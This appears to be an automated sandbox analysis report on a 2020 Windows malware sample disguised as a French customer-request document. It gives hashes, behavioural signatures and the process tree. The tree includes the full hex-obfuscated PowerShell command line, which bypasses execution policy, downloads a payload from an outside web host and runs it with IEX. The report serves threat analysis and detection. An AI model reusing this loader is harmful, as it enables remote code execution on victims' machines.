Analysis
-
max time kernel
13s -
max time network
126s -
platform
windows10_x64 -
resource
win10 -
submitted
31-07-2020 10:56
Static task
static1
Behavioral task
behavioral1
Sample
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
Resource
win7v200722
Behavioral task
behavioral2
Sample
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
Resource
win10
General
-
Target
Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
-
Size
19KB
-
MD5
36117a183609bb6953d3f78bb45ee5b9
-
SHA1
0d89d56bac5838a3f0854e43b42e564d290f4935
-
SHA256
3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1
-
SHA512
79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2
Malware Config
Signatures
-
Blacklisted process makes network request 1 IoCs
Processes:
Powershell.exeflow pid process 3 2020 Powershell.exe -
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2020 3928 Powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
Powershell.exedescription pid process Token: SeDebugPrivilege 2020 Powershell.exe Token: SeIncreaseQuotaPrivilege 2020 Powershell.exe Token: SeSecurityPrivilege 2020 Powershell.exe Token: SeTakeOwnershipPrivilege 2020 Powershell.exe Token: SeLoadDriverPrivilege 2020 Powershell.exe Token: SeSystemProfilePrivilege 2020 Powershell.exe Token: SeSystemtimePrivilege 2020 Powershell.exe Token: SeProfSingleProcessPrivilege 2020 Powershell.exe Token: SeIncBasePriorityPrivilege 2020 Powershell.exe Token: SeCreatePagefilePrivilege 2020 Powershell.exe Token: SeBackupPrivilege 2020 Powershell.exe Token: SeRestorePrivilege 2020 Powershell.exe Token: SeShutdownPrivilege 2020 Powershell.exe Token: SeDebugPrivilege 2020 Powershell.exe Token: SeSystemEnvironmentPrivilege 2020 Powershell.exe Token: SeRemoteShutdownPrivilege 2020 Powershell.exe Token: SeUndockPrivilege 2020 Powershell.exe Token: SeManageVolumePrivilege 2020 Powershell.exe Token: 33 2020 Powershell.exe Token: 34 2020 Powershell.exe Token: 35 2020 Powershell.exe Token: 36 2020 Powershell.exe Token: SeIncreaseQuotaPrivilege 2020 Powershell.exe Token: SeSecurityPrivilege 2020 Powershell.exe Token: SeTakeOwnershipPrivilege 2020 Powershell.exe Token: SeLoadDriverPrivilege 2020 Powershell.exe Token: SeSystemProfilePrivilege 2020 Powershell.exe Token: SeSystemtimePrivilege 2020 Powershell.exe Token: SeProfSingleProcessPrivilege 2020 Powershell.exe Token: SeIncBasePriorityPrivilege 2020 Powershell.exe Token: SeCreatePagefilePrivilege 2020 Powershell.exe Token: SeBackupPrivilege 2020 Powershell.exe Token: SeRestorePrivilege 2020 Powershell.exe Token: SeShutdownPrivilege 2020 Powershell.exe Token: SeDebugPrivilege 2020 Powershell.exe Token: SeSystemEnvironmentPrivilege 2020 Powershell.exe Token: SeRemoteShutdownPrivilege 2020 Powershell.exe Token: SeUndockPrivilege 2020 Powershell.exe Token: SeManageVolumePrivilege 2020 Powershell.exe Token: 33 2020 Powershell.exe Token: 34 2020 Powershell.exe Token: 35 2020 Powershell.exe Token: 36 2020 Powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
Powershell.exepid process 2020 Powershell.exe 2020 Powershell.exe 2020 Powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X1⤵
- Blacklisted process makes network request
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses